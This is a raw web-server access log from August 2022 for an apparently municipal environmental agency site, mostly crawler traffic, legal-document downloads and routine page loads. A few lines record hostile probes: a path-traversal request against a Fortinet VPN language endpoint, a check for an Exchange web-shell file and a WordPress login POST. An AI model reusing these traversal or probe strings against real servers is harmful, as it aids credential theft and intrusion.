207.46.13.188 - - [13/Aug/2022:16:10:36 -0500] "GET /bla/resoluciones/resoluciones%201998/RESOLUCION%20239%20DE%201998.pdf HTTP/1.1" 304 -
172.22.2.4 - - [13/Aug/2022:16:11:03 -0500] "GET /BLA/boletinlegal/remote/fgt_lang?lang=/../../../..//////////dev/ HTTP/1.1" 404 1018
201.245.192.253 - - [13/Aug/2022:16:11:50 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
216.245.221.92 - - [13/Aug/2022:16:12:24 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [13/Aug/2022:16:13:19 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=4552&usuario=&sector=&fecha=2021&resuelve= HTTP/1.1" 200 1082
172.22.2.4 - - [13/Aug/2022:16:12:58 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [13/Aug/2022:16:13:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
109.205.213.8 - - [13/Aug/2022:16:16:25 -0500] "\x16\x03\x01" 400 226
109.205.213.8 - - [13/Aug/2022:16:16:26 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [13/Aug/2022:16:16:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
45.83.245.167 - - [13/Aug/2022:16:17:08 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [13/Aug/2022:16:17:24 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [13/Aug/2022:16:18:48 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [13/Aug/2022:16:20:30 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47383
201.245.192.253 - - [13/Aug/2022:16:20:34 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 48475
172.22.2.4 - - [13/Aug/2022:16:19:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
201.245.192.253 - - [13/Aug/2022:16:21:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
216.245.221.92 - - [13/Aug/2022:16:22:24 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [13/Aug/2022:16:23:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57291
172.22.2.4 - - [13/Aug/2022:16:24:38 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [13/Aug/2022:16:26:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [13/Aug/2022:16:25:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
216.245.221.92 - - [13/Aug/2022:16:27:24 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.33 - - [13/Aug/2022:16:28:26 -0500] "-" 408 -
173.252.95.2 - - [13/Aug/2022:16:28:27 -0500] "GET /secretaria-de-ambiente-ha-recuperado-mas-de-11-000-especimenes-silvestres.html HTTP/1.1" 206 961
173.252.95.3 - - [13/Aug/2022:16:28:28 -0500] "GET /images/lagartija-animal-trafico-fauna-31-octubre.jpg HTTP/1.1" 200 45684
102.129.152.248 - - [13/Aug/2022:16:28:41 -0500] "GET / HTTP/1.1" 200 319
173.252.83.11 - - [13/Aug/2022:16:28:54 -0500] "GET /images/lagartija-animal-trafico-fauna-31-octubre.jpg HTTP/1.1" 200 45684
173.252.95.15 - - [13/Aug/2022:16:29:04 -0500] "GET /pacto-por-la-madera-legal-gobernanza-forestal-el-camino-para-la-sostenibilidad.html HTTP/1.1" 206 1051
172.22.2.4 - - [13/Aug/2022:16:28:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
40.77.167.65 - - [13/Aug/2022:16:29:27 -0500] "GET /BLA/boletinlegal/Circulares/2018/CIRCULAR%20COJUNTA%20042%20DE%202018.pdf HTTP/1.1" 304 -
173.252.95.119 - - [13/Aug/2022:16:29:38 -0500] "GET /cuando-un-humedal-es-tu-oficina-la-labor-de-los-administradores-de-estos-ecosistemas.html HTTP/1.1" 206 957
201.245.192.253 - - [13/Aug/2022:16:30:30 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47383
201.245.192.253 - - [13/Aug/2022:16:30:34 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 48475
190.24.103.160 - - [13/Aug/2022:16:30:41 -0500] "GET /BLA/resoluciones/index.php?dir= HTTP/1.1" 200 13093
190.24.103.160 - - [13/Aug/2022:16:30:50 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2009%2F HTTP/1.1" 200 1694101
172.22.2.4 - - [13/Aug/2022:16:30:56 -0500] "GET /BLA/boletinlegal/Circulares/2010/Circular%2004%20de%2021%20de%20abril%20de%202010.pdf HTTP/1.1" 200 682373
172.22.2.4 - - [13/Aug/2022:16:30:57 -0500] "GET /BLA/boletinlegal/Directivas/2017/Directiva%20No.%2005%20del%2013%20de%20Junio%20de%202017.pdf HTTP/1.1" 200 853105
201.245.192.253 - - [13/Aug/2022:16:31:47 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [13/Aug/2022:16:31:57 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
172.22.2.4 - - [13/Aug/2022:16:31:58 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [13/Aug/2022:16:31:58 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [13/Aug/2022:16:30:28 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [13/Aug/2022:16:32:19 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=3663&usuario=&sector=&fecha=2017&resuelve= HTTP/1.1" 200 1784
216.245.221.92 - - [13/Aug/2022:16:32:24 -0500] "HEAD / HTTP/1.1" 200 -
186.144.252.26 - - [13/Aug/2022:16:32:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/3663.pdf HTTP/1.1" 200 257553
172.22.2.4 - - [13/Aug/2022:16:31:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
2.57.122.98 - - [13/Aug/2022:16:35:54 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [13/Aug/2022:16:36:46 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
216.245.221.92 - - [13/Aug/2022:16:37:24 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [13/Aug/2022:16:36:18 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [13/Aug/2022:16:36:30 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 49680
172.22.2.4 - - [13/Aug/2022:16:37:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52868
45.95.55.5 - - [13/Aug/2022:16:40:24 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [13/Aug/2022:16:40:24 -0500] "GET /BLA/boletinlegal/Circulares/2022/CIRCULAR%20No.%2000005%20DEL%2030%20DE%20JUNIO%20DEL%202022.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [13/Aug/2022:16:40:29 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1218
201.245.192.253 - - [13/Aug/2022:16:40:30 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47383
201.245.192.253 - - [13/Aug/2022:16:40:34 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 48475
23.100.232.233 - - [13/Aug/2022:16:40:49 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
23.100.232.233 - - [13/Aug/2022:16:40:49 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
23.100.232.233 - - [13/Aug/2022:16:40:49 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
201.245.192.253 - - [13/Aug/2022:16:41:46 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
109.248.6.35 - - [13/Aug/2022:16:41:48 -0500] "GET / HTTP/1.0" 200 319
216.245.221.92 - - [13/Aug/2022:16:42:24 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [13/Aug/2022:16:42:08 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
92.118.160.25 - - [13/Aug/2022:16:44:23 -0500] "GET / HTTP/1.0" 200 319
114.119.134.93 - - [13/Aug/2022:16:44:37 -0500] "-" 408 -
172.22.2.4 - - [13/Aug/2022:16:42:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58566
181.61.206.204 - - [13/Aug/2022:16:45:05 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
181.61.206.204 - - [13/Aug/2022:16:45:05 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 200 4804
181.61.206.204 - - [13/Aug/2022:16:45:05 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 200 851
181.61.206.204 - - [13/Aug/2022:16:45:05 -0500] "GET /appsia/images/logo_bogota_p.png HTTP/1.1" 200 14951
181.61.206.204 - - [13/Aug/2022:16:45:05 -0500] "GET /appsia/images/cabezoteHojaVida.png HTTP/1.1" 200 32493
172.22.2.4 - - [13/Aug/2022:16:45:45 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=4462&usuario=&sector=&fecha=2020&resuelve= HTTP/1.1" 200 1070
172.22.2.4 - - [13/Aug/2022:16:46:37 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-606-15.docx HTTP/1.1" 200 26698
172.22.2.4 - - [13/Aug/2022:16:46:39 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [13/Aug/2022:16:46:39 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [13/Aug/2022:16:46:39 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [13/Aug/2022:16:46:39 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [13/Aug/2022:16:46:39 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
172.22.2.4 - - [13/Aug/2022:16:46:39 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [13/Aug/2022:16:46:39 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [13/Aug/2022:16:46:40 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [13/Aug/2022:16:46:40 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [13/Aug/2022:16:46:40 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
201.245.192.253 - - [13/Aug/2022:16:46:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
216.245.221.92 - - [13/Aug/2022:16:47:24 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [13/Aug/2022:16:47:58 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [13/Aug/2022:16:48:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
157.55.39.84 - - [13/Aug/2022:16:50:57 -0500] "GET /catalogoisis/js/aceptarlimpiar.js HTTP/1.1" 200 331
185.119.81.109 - - [13/Aug/2022:16:51:17 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.109 - - [13/Aug/2022:16:51:18 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
201.245.192.253 - - [13/Aug/2022:16:51:43 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
216.245.221.92 - - [13/Aug/2022:16:52:24 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [13/Aug/2022:16:53:00 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
157.55.39.98 - - [13/Aug/2022:16:53:20 -0500] "GET /Publicaciones/2022EE88505.pdf HTTP/1.1" 404 227
172.22.2.4 - - [13/Aug/2022:16:53:43 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=3663&usuario=&sector=&fecha=2017&resuelve= HTTP/1.1" 200 1784
172.22.2.4 - - [13/Aug/2022:16:53:48 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [13/Aug/2022:16:54:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60865
201.245.192.253 - - [13/Aug/2022:16:56:42 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
216.245.221.92 - - [13/Aug/2022:16:57:24 -0500] "HEAD / HTTP/1.1" 200 -
200.118.242.169 - - [13/Aug/2022:16:59:07 -0500] "GET /BLA/resoluciones/AUTOS%202020/4462.pdf HTTP/1.1" 200 393570
172.22.2.4 - - [13/Aug/2022:16:59:38 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [13/Aug/2022:17:01:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [13/Aug/2022:17:00:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55211
216.245.221.92 - - [13/Aug/2022:17:02:24 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [13/Aug/2022:17:05:21 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/ANALISIST-672-14.docx HTTP/1.1" 200 22530
172.22.2.4 - - [13/Aug/2022:17:05:34 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
172.22.2.4 - - [13/Aug/2022:17:05:40 -0500] "GET /BLA/boletinlegal/images/screen_2.png HTTP/1.1" 200 362502
172.22.2.4 - - [13/Aug/2022:17:05:40 -0500] "GET /BLA/boletinlegal/images/screen_3.png HTTP/1.1" 200 210620
172.22.2.4 - - [13/Aug/2022:17:05:40 -0500] "GET /BLA/boletinlegal/images/screen_5.png HTTP/1.1" 200 368876
172.22.2.4 - - [13/Aug/2022:17:05:40 -0500] "GET /BLA/boletinlegal/images/arr_r.jpg HTTP/1.1" 200 1998
172.22.2.4 - - [13/Aug/2022:17:05:49 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
172.22.2.4 - - [13/Aug/2022:17:05:51 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=RUIDO&fecha=2021&resuelve=recurso HTTP/1.1" 200 2737
172.22.2.4 - - [13/Aug/2022:17:05:51 -0500] "GET /BLA/boletinlegal/images/background.gif HTTP/1.1" 200 -
172.22.2.4 - - [13/Aug/2022:17:06:05 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=RUIDO&fecha=2020&resuelve=recurso HTTP/1.1" 200 3749
23.100.232.233 - - [13/Aug/2022:17:06:06 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
23.100.232.233 - - [13/Aug/2022:17:06:06 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
23.100.232.233 - - [13/Aug/2022:17:06:06 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
172.22.2.4 - - [13/Aug/2022:17:06:17 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=RUIDO&fecha=2019&resuelve=recurso HTTP/1.1" 200 16075
186.154.121.188 - - [13/Aug/2022:17:06:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3497.pdf HTTP/1.1" 200 290396
201.245.192.253 - - [13/Aug/2022:17:06:40 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
186.154.121.188 - - [13/Aug/2022:17:06:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3208.pdf HTTP/1.1" 200 267344
186.154.121.188 - - [13/Aug/2022:17:06:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3169.pdf HTTP/1.1" 200 271606
186.154.121.188 - - [13/Aug/2022:17:06:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2785.pdf HTTP/1.1" 200 266037
186.154.121.188 - - [13/Aug/2022:17:07:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2343.pdf HTTP/1.1" 200 261218
172.22.2.4 - - [13/Aug/2022:17:05:28 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [13/Aug/2022:17:05:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52484
186.154.121.188 - - [13/Aug/2022:17:07:14 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2112.pdf HTTP/1.1" 200 273341
186.154.121.188 - - [13/Aug/2022:17:07:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2110.pdf HTTP/1.1" 200 262442
216.245.221.92 - - [13/Aug/2022:17:07:24 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.84 - - [13/Aug/2022:17:07:25 -0500] "GET /BLA/boletinlegal/normativa.php HTTP/1.1" 200 8326
172.22.2.4 - - [13/Aug/2022:17:07:37 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=RUIDO&fecha=2022&resuelve=recurso HTTP/1.1" 200 626
172.22.2.4 - - [13/Aug/2022:17:07:42 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=RUIDO&fecha=2018&resuelve=recurso HTTP/1.1" 200 8859
40.77.167.65 - - [13/Aug/2022:17:07:45 -0500] "GET /BLA/boletinlegal/js/ajax_normativa.js HTTP/1.1" 200 1154
186.154.121.188 - - [13/Aug/2022:17:07:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/0264.pdf HTTP/1.1" 200 276865
172.22.2.4 - - [13/Aug/2022:17:06:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56367
186.154.121.188 - - [13/Aug/2022:17:08:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/0261.pdf HTTP/1.1" 200 245440
66.249.66.13 - - [13/Aug/2022:17:08:23 -0500] "-" 408 -
207.46.13.20 - - [13/Aug/2022:17:09:00 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [13/Aug/2022:17:11:39 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [13/Aug/2022:17:12:10 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=RUIDO&fecha=2017&resuelve=recurso HTTP/1.1" 200 4953
216.245.221.92 - - [13/Aug/2022:17:12:24 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [13/Aug/2022:17:12:28 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=RUIDO&fecha=2016&resuelve=recurso HTTP/1.1" 200 1061
186.154.121.188 - - [13/Aug/2022:17:12:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1636.pdf HTTP/1.1" 200 624201
172.22.2.4 - - [13/Aug/2022:17:12:48 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=RUIDO&fecha=2015&resuelve=recurso HTTP/1.1" 200 1075
172.22.2.4 - - [13/Aug/2022:17:12:53 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=RUIDO&fecha=2014&resuelve=recurso HTTP/1.1" 200 626
172.22.2.4 - - [13/Aug/2022:17:11:18 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [13/Aug/2022:17:12:58 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=RUIDO&fecha=2013&resuelve=recurso HTTP/1.1" 200 626
172.22.2.4 - - [13/Aug/2022:17:12:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57366
172.22.2.4 - - [13/Aug/2022:17:15:56 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2011%20del%2027%20de%20Agosto%20de%202012.pdf HTTP/1.1" 200 526945
201.245.192.253 - - [13/Aug/2022:17:16:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
216.245.221.92 - - [13/Aug/2022:17:17:24 -0500] "HEAD / HTTP/1.1" 200 -
221.2.163.231 - - [13/Aug/2022:17:18:18 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [13/Aug/2022:17:17:08 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
157.55.39.84 - - [13/Aug/2022:17:19:37 -0500] "GET /bla/resoluciones/index.php?dir=resoluciones+2002/res+2002+951-1000 HTTP/1.1" 200 12521
172.22.2.4 - - [13/Aug/2022:17:17:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
157.55.39.84 - - [13/Aug/2022:17:19:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202000/2000%201050-1099.tif HTTP/1.1" 200 4573468
23.100.232.233 - - [13/Aug/2022:17:19:50 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
23.100.232.233 - - [13/Aug/2022:17:19:50 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
23.100.232.233 - - [13/Aug/2022:17:19:50 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
172.22.2.4 - - [13/Aug/2022:17:20:05 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
172.22.2.4 - - [13/Aug/2022:17:20:08 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
172.22.2.4 - - [13/Aug/2022:17:20:26 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=4552&usuario=&sector=&fecha=2021&resuelve= HTTP/1.1" 200 1082
201.245.192.253 - - [13/Aug/2022:17:20:30 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47401
201.245.192.253 - - [13/Aug/2022:17:20:34 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 48470
172.22.2.4 - - [13/Aug/2022:17:20:47 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=4552&usuario=&sector=&fecha=2021&resuelve= HTTP/1.1" 200 1082
193.118.53.218 - - [13/Aug/2022:17:20:55 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110281
201.245.192.253 - - [13/Aug/2022:17:21:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
157.55.39.84 - - [13/Aug/2022:17:22:17 -0500] "GET /galeria/galeria/fotos/reciclatonP.jpg HTTP/1.1" 200 57069
216.245.221.92 - - [13/Aug/2022:17:22:24 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [13/Aug/2022:17:22:52 -0500] "GET /BLA/boletinlegal/Circulares/2022/CIRCULAR%20No.%2000005%20DEL%2030%20DE%20JUNIO%20DEL%202022.pdf HTTP/1.1" 404 1038
23.100.232.233 - - [13/Aug/2022:17:23:47 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/totalsoft.css?ver=4.9.8 HTTP/1.1" 200 40622
23.100.232.233 - - [13/Aug/2022:17:23:47 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/CSS/Total-Soft-Gallery-Video-Widget.css?ver=4.9.8 HTTP/1.1" 200 51554
23.100.232.233 - - [13/Aug/2022:17:23:48 -0500] "GET /portaldeninos/wp-content/uploads/useanyfont/uaf.css?ver=1589905315 HTTP/1.1" 200 408
23.100.232.233 - - [13/Aug/2022:17:23:48 -0500] "GET /portaldeninos/wp-content/themes/betheme/style.css?ver=20.9.6 HTTP/1.1" 200 287
23.100.232.233 - - [13/Aug/2022:17:23:48 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/base.css?ver=20.9.6 HTTP/1.1" 200 57283
23.100.232.233 - - [13/Aug/2022:17:23:50 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.css?ver=20.9.6 HTTP/1.1" 200 58508
23.100.232.233 - - [13/Aug/2022:17:23:49 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/shortcodes.css?ver=20.9.6 HTTP/1.1" 200 138889
23.100.232.233 - - [13/Aug/2022:17:23:50 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/css/jplayer.blue.monday.css?ver=20.9.6 HTTP/1.1" 200 9834
23.100.232.233 - - [13/Aug/2022:17:23:50 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/ui/jquery.ui.all.css?ver=20.9.6 HTTP/1.1" 200 18765
23.100.232.233 - - [13/Aug/2022:17:23:51 -0500] "GET /portaldeninos/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend-gtag.min.js?ver=8.5.0 HTTP/1.1" 200 11801
23.100.232.233 - - [13/Aug/2022:17:23:51 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1" 200 97184
23.100.232.233 - - [13/Aug/2022:17:23:51 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4 HTTP/1.1" 200 4000
23.100.232.233 - - [13/Aug/2022:17:23:51 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/modernizr.custom.js?ver=4.9.8 HTTP/1.1" 200 9019
23.100.232.233 - - [13/Aug/2022:17:23:52 -0500] "GET /portaldeninos/wp-includes/js/wp-emoji-release.min.js?ver=4.9.8 HTTP/1.1" 200 12026
23.100.232.233 - - [13/Aug/2022:17:23:52 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/layout.css?ver=20.9.6 HTTP/1.1" 200 116639
23.100.232.233 - - [13/Aug/2022:17:23:53 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 10056
23.100.232.233 - - [13/Aug/2022:17:23:53 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/Total-Soft-Gallery-Video-Widget.js?ver=4.9.8 HTTP/1.1" 200 80264
23.100.232.233 - - [13/Aug/2022:17:23:53 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/responsive.css?ver=20.9.6 HTTP/1.1" 200 55740
23.100.232.233 - - [13/Aug/2022:17:23:54 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4 HTTP/1.1" 200 3148
23.100.232.233 - - [13/Aug/2022:17:23:54 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4 HTTP/1.1" 200 6908
23.100.232.233 - - [13/Aug/2022:17:23:55 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4 HTTP/1.1" 200 12110
23.100.232.233 - - [13/Aug/2022:17:23:55 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/sortable.min.js?ver=1.11.4 HTTP/1.1" 200 24899
23.100.232.233 - - [13/Aug/2022:17:23:55 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/menu.js?ver=20.9.6 HTTP/1.1" 200 2449
23.100.232.233 - - [13/Aug/2022:17:23:55 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/plugins.js?ver=20.9.6 HTTP/1.1" 200 197151
23.100.232.233 - - [13/Aug/2022:17:23:56 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/jplayer.min.js?ver=20.9.6 HTTP/1.1" 200 52702
23.100.232.233 - - [13/Aug/2022:17:23:57 -0500] "GET /portaldeninos/wp-includes/js/wp-embed.min.js?ver=4.9.8 HTTP/1.1" 200 1398
23.100.232.233 - - [13/Aug/2022:17:23:57 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/scripts.js?ver=20.9.6 HTTP/1.1" 200 77162
23.100.232.233 - - [13/Aug/2022:17:23:57 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/accordion.min.js?ver=1.11.4 HTTP/1.1" 200 8584
23.100.232.233 - - [13/Aug/2022:17:23:57 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.js?ver=20.9.6 HTTP/1.1" 200 1896
172.22.2.4 - - [13/Aug/2022:17:22:58 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [13/Aug/2022:17:25:07 -0500] "GET /BLA/boletinlegal/owa/auth/x.js HTTP/1.1" 404 1018
172.22.2.4 - - [13/Aug/2022:17:23:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60865
172.22.2.4 - - [13/Aug/2022:17:26:09 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=0686&usuario=&sector=&fecha=2017&resuelve= HTTP/1.1" 200 2617
